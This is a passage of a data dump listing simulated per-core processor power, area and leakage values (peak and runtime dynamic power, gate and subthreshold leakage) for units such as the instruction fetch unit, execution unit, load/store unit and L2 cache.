'Load Store Unit/LoadQ/Peak Dynamic': 0.0887144,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0887144,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.39988,
'Load Store Unit/Runtime Dynamic': 1.85974,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.218755,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.437509,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0776367,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0789262,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.056653,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.692712,
'Memory Management Unit/Runtime Dynamic': 0.135579,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 26.1087,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.695385,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0329045,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.233338,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.961628,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.69601,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0711588,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.25858,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.382562,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.209641,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.338143,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.170683,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.718467,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.181117,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.85235,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0722741,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00879328,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.090297,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0650317,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.162571,
'Execution Unit/Register Files/Runtime Dynamic': 0.0738249,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.208024,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.462859,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.91911,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00155458,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00155458,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00138614,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000554157,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000934185,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00542949,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0137582,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0625166,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.97659,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.184138,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.212335,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.3881,
'Instruction Fetch Unit/Runtime Dynamic': 0.478177,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0554479,
'L2/Runtime Dynamic': 0.0112482,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.80385,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.765722,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0506874,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0506873,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.0432,
'Load Store Unit/Runtime Dynamic': 1.06638,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.124986,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.249972,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0443581,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.045061,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.24725,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0305711,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.479558,
'Memory Management Unit/Runtime Dynamic': 0.075632,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.4081,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.19012,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0117721,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.102482,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.304375,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.85492,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.057696,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.248006,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.309307,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.193643,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.312339,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.157658,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.66364,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.174051,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.70975,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0584347,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00812226,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0804269,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0600691,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.138862,
'Execution Unit/Register Files/Runtime Dynamic': 0.0681914,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.183864,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.423174,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.80839,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00150827,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00150827,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00133655,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000529892,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000862897,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00521599,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0136451,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.057746,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.67314,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.181378,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.196131,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.06992,
'Instruction Fetch Unit/Runtime Dynamic': 0.454116,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0597128,
'L2/Runtime Dynamic': 0.0114138,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.73199,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.731276,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
